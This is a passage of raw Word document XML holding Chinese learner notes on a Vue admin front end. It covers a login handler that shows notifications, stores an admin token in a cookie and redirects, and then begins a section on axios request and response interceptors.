        <w:t xml:space="preserve">            login(form.username, form.password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071081B5" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4CA1FF" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59EF71AD" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    console.log(res.data.data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E8E2F9" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E583E39" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    ElNotification({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5813C2" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        message: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAC77A" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        type: 'sucess',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C37088" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        duration: 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0E9BF" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D42426" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7B7E86" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1C7C6" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0549E2C1" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRPr="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7CE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7CE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7CE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7CE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7CE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和用户相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8CC845" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRPr="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EC0E2D" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRPr="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7CE4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    const cookie = useCookies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE8D226" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRPr="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7CE4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    cookie.set('admin-token', res.data.data.token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2FB1B" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F82C07" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转到后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBDCDA1" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58865F18" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    router.push("/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FB121B" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF26F58" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA6857F" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .catch(err =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755C1CCB" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    // console.log(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C998C5" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    // console.log(err.response.data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F6B5AC" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    // console.log()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A48E35" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    ElNotification({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F05183" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        // title: 'Error',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2973C24B" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        message: err.response.data.msg || "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F17775" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        type: 'error',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280B6E5" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        duration: 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF53E8A" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D1BB0" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CBE376" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E20C60" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A7F70" w14:textId="1C016A09" w:rsidR="00641158" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0247DB1C" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC3182E" w14:textId="555DDAFC" w:rsidR="00FF4229" w:rsidRPr="00FF4229" w:rsidRDefault="00FF4229" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="695" w:name="_Toc159780125"/>
      <w:r w:rsidRPr="00FF4229">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求拦截器和响应拦截器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="695"/>
    </w:p>
    <w:p w14:paraId="19AD7879" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCEB0D1" w14:textId="1B3BC5D5" w:rsidR="00614497" w:rsidRDefault="00614497" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axio</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的官方文档找拦截器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722AA57A" w14:textId="450EC582" w:rsidR="00641158" w:rsidRDefault="00614497" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00614497">
        <w:t>http://www.axios-js.com/zh-cn/docs/#%E6%8B%A6%E6%88%AA%E5%99%A8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691B3879" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B52F35D" w14:textId="78AA7736" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>拦截器的大意，全局处理数据返回什么这种的，相当于前端统一处理结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D011302" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E09C42" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365F32FB" w14:textId="77777777" w:rsidR="00614497" w:rsidRPr="00614497" w:rsidRDefault="00614497" w:rsidP="009222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textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>添加请求拦截器</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>axios.interceptors.request.use(</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8959A8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4271AE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="F5871F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4271AE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>在发送请求之前做些什么</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8959A8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> config;</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">  }, </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8959A8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4271AE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="F5871F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4271AE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
